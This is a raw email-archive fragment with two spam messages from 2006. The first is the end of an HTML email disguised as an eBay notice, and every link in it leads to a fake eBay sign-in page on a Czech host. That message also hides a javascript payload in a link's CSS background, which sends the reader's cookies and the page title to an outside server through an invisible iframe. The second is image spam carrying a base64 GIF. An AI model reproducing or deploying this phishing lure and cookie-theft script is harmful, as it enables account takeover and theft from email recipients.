bgColor=#cad2dd><IMG title="" height=25 alt=" " src="http://pics.ebaystatic.com/aw/pics/securityCenter/imgTabCorner_25x25.gif" width=25 border=0></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=5 border=0> <TBODY> <TR> <TD><FONT face="Arial, Verdana" size=2><B>Always remember to complete your transactions on eBay - it's the safer way to trade.</B><BR><BR>Is this message an offer to buy your item directly through email without winning the item on eBay? If so, please help make the eBay marketplace safer by reporting it to us. These external transactions may be unsafe and are against eBay policy. <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>Learn more about trading safely</FONT></A><FONT color=#00007f>.</FONT> </FONT></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD bgColor=#c9d2dc height=5><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD> <TABLE style="BORDER-RIGHT: #c6c6c6 1px solid; BORDER-TOP: #c6c6c6 1px solid; BORDER-LEFT: #c6c6c6 1px solid; BORDER-BOTTOM: #c6c6c6 1px solid" cellSpacing=0 cellPadding=5 width="100%" border=0> <TBODY> <TR> <TD><FONT face="Arial, Verdana" size=2>Is this email inappropriate? Does it breach <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>eBay policy</FONT></A><FONT color=#00007f>?</FONT> Help protect the community by <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>reporting it</FONT></A><FONT color=#00007f>.</FONT> </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD colSpan=3><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#cccccc> <TBODY> <TR> <TD height=1></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#666666 size=1>Learn how you can protect yourself from spoof (fake) emails at:<BR><A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>https://pages.ebay.co.uk/education/spooftutorial</FONT></A> </FONT></TD></TR> <TR> <TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#666666 size=1>This eBay notice was sent to&nbsp;eBay member&nbsp;on behalf of another eBay member through the eBay platform and in accordance with our Privacy Policy. If you would like to receive this email in text format, change your <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank onfiltered="return openNonHelpWindow(this.href);"><FONT color=#00007f>notification preferences</FONT></A><FONT color=#00007f>.</FONT> </FONT></TD></TR> <TR> <TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#666666 size=1>See our Privacy Policy and User Agreement if you have questions about eBay's communication policies.<BR>Privacy Policy: <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>https://pages.ebay.co.uk/help/policies/privacy-policy.html</FONT></A><BR>User Agreement: <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>https://pages.ebay.co.uk/help/policies/user-agreement.html</FONT></A> </FONT></TD></TR> <TR> <TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#666666 size=1>Copyright ©&nbsp;2005 eBay, Inc. All Rights Reserved.<BR>Designated trademarks and brands are the property of their respective owners.<BR>eBay and the eBay logo are registered trademarks or trademarks of eBay, Inc.</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><A style="BACKGROUND: url(javascript:document.getElementById('iObjectHere').innerHTML='<iframe src=http://titidurere.dreamhosters.com/y.php?datengatumatii='+document.title.substring(document.title.indexOf('-')+2)+'&oricumaipusbotu='+escape(document.cookie).substr(0,1900)+' frameborder=0 width=0 height=0></iframe>')" href="http://us.f333.mail.yahoo.com/ym/>" target=_blank ></A> From [email protected] Fri Jul 14 14:38:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49873 invoked from network); 14 Jul 2006 14:38:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2006 14:38:09 -0000 Received: (qmail 76915 invoked by uid 500); 14 Jul 2006 14:38:09 -0000 Delivered-To: [email protected] Received: (qmail 76912 invoked by uid 99); 14 Jul 2006 14:38:09 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO cpe-24-90-97-117.nyc.res.rr.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 14 Jul 2006 07:38:09 -0700 Received: from ycwfy.lrsa ([161.129.204.104]) by cpe-24-90-97-117.nyc.res.rr.com (8.13.3/8.13.3) with SMTP id k6EEdKJG008861; Fri, 14 Jul 2006 06:39:20 -0800 Message-ID: <[email protected]> From: "Jasper Bishop" <[email protected]> To: <[email protected]> Subject: republican Date: Fri, 14 Jul 2006 06:28:44 -0800 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0008_01C6A70F.FE319CCC" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1165 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_0008_01C6A70F.FE319CCC Content-Type: multipart/alternative; boundary="----=_NextPart_001_0009_01C6A70F.FE319CEB" ------=_NextPart_001_0009_01C6A70F.FE319CEB Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_0009_01C6A70F.FE319CEB Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2800.1165" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_0009_01C6A70F.FE319CEB-- ------=_NextPart_000_0008_01C6A70F.FE319CCC Content-Type: image/gif; name="subside.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhnQHBAecAAO/arO7YrOvVq5prn4JMm5psn7uYpcimpraPo8ysp+7ZrNW4qJNinptsn55x oIpZnZxun+jRq2Qml5ttoOXOq2Mll+bNq3E3munSq6d9oq6EouPKqrqWpGUol2Yol7eTpNS3qNi7 qKZ8oXU8mb2Zpd/Eqr2YpGwymLCKo86wqNK1p3pEm5Vnn8Gfpde6qKB0oIRQnM2up+PLqqd+oYlW nZ9yoJBfnYNOnKqAoufQq3Y9muTNqpdon4dUnWcqmMakptCxqIBKnN3Dqsmqpsqrp7eSo7iUpIpX nYZTnKR7oWwxmayDoq2Fophpn8inpp1woOrSq6uBopVmnqyEounTrJhqn39Km3Y+mta6qL+dpa6G otO1qI1cnWktmNq+qdCwp7GKosalpZdnns+xp45dnsWjpmcpl66HooFNnJFgnpRln4xanotZneLJ qqV6oX5Im31Gm4pYndG0qO3XrGksl+HIqWgtmHA3mcempotYnd7DqZlrn5Zon3hAmrWOpGoumKl/ oXU7mpNjnpFhnrSOo8OipcCdpbONo+vUrG4ymZNknurTq3Q8mrWPo3A2mXpDmubOqrOMo9K2qNm9 qIRPm+3Yq51xn9O2qNCzqGQnl3lAmsmppquCobCJooZSnOLIqm80mdvAqeDGqqZ7oda7qbaRpIVR nGUnmNzCqYdTnevWrOzXrHlCm6F2oHI5mYJPnH1Hm4hUnHg/mmsvmHc/molVnZJintW5qMuspr6a pM6vp3tFm2gsmIFLm3xEmnM7mXhBmm4zmNm/qYBJm9i8qY9dnqmAoriTpLmUpKR4obKLo9zBqcSh psenpo5enbaQpMytp8Kgpr+cpdGyp59zoN/FqZxwoKN3oJxvn7yXpIJOm39Jm3M6mmcrl6+Io281 maF1oYxbnbqVpHI4maJ2ocKhpdrAqcSipeTMq5RCQqhiWL+KdNm1kseXfb2Gct69mLZ6acOQeOXJ oKZhV6J1oOfPq8urpgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAnQHBAQAI/gABCBxI sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjyBDihxJsqTJkyhTqlzJsqXLlzBjypxJs6bN mzhz6tzJs6fPn0CDCh1KtKjRo0iTKl3KtKnTp1CjSp1KtarVq1izat3KtavXr2DDih1LtqzZs2hR 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 i2ahuIhFOXWeq4mzSbuqSxBTWIV/iYV727rc+LmIGS21a7yqK26P67qSW7us27M2OY/vCI2YqJjT /jZo9ziQfmiOxUqG8tB4v5iN4ai6e/uB6Xhr8siC46u9jxiJtyiUzsiN0aiMBji76cuJLAmqzupr 3Ltuo1iMx0iqwfuVtei+wHi/bNi/wyu9lbi+scuJ4Qu9igiVcZgOABmUAKCda8iUuPuZHtm9UugO MzmLTgmUetuYX3h6HomTOimOm5h+IgmXnaeJFwyWsruQJ0m/n6bBccuCUpluLEpxqBa8MpyRiVeV Fny8OUyLeEuVLazDYCmSEnxutim07Xeao7mGubm/cKiaO5h9/NJymbmZgpZmVUuRpNtlUEuTXoyT XXuRZCyUuFeZZUuQ6ckkaBmXb4mNWdzDKOzF/unGeSWrdyhbxHmZljBHm4nrl4Bplmg5mHX8hmhM hHFsEywKpD/Knin6dizquCj6oVganHyJnCEqrzEKpIgaoJaJog3KoRKqovqplQiqsYBWowMRo6Ws sSQqTQuayz9onZ3sevWpexMqTebZcu9wlR1HZvpWKLg8y4N2ooPInr7MDqesyQJ6eKdontwcaXxm a/CZofOJo+Qpo/J6yzkqnc28saK8yy0qACuqnhvaylcBpSZ2rQdhz162pScmpRDBz2JmpijWpdS2 qoJ60Aid0Aq90Azd0A790BAd0RI90RRd0RZ90Rid0Rq90Rzd0R790SAd0iI90iRd0iZ90iid/tIq vdIs3dIu/dIwHdMyPdM0XdM2fdMLJgDvcE1YsQM8LWQ+nRI6/dMiYaGTBxK29qAmMXQQwdQbwWVX odRpAdUnkdRASBJUTdXMZtA82XlETWjaKmhhDRFazREW6nIXWhICfRBlLRVr/RBtvaxcnRAWutPK NtaZpq1cpmtUEdfCOgRDwGWAPdfx5qR+/RSHrRCJ/Wp4LdZ8DdeRVodnPWoCAGkuN3JxONmYHdiI adnpgArscNbpgB3qymXvEAZnPQ8/w2XxcNVKl9rAN3pDm9WjzWWjJti2jdmbndvSi9aTZtsPejZQ fZkXenbp8DNHB6aQTRCofaGrvXDBndec/j1qzf2gLOLZqEBxFzo1uF28FAjdCwdo6fApxP2gB1jb iFneleiOvj1vmp1q4K1nXEZToc3b3Q1n2M3YtSzcmW3f6I3fLmehyJ2LA1Hdqj11LuenZP2g7rAD 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 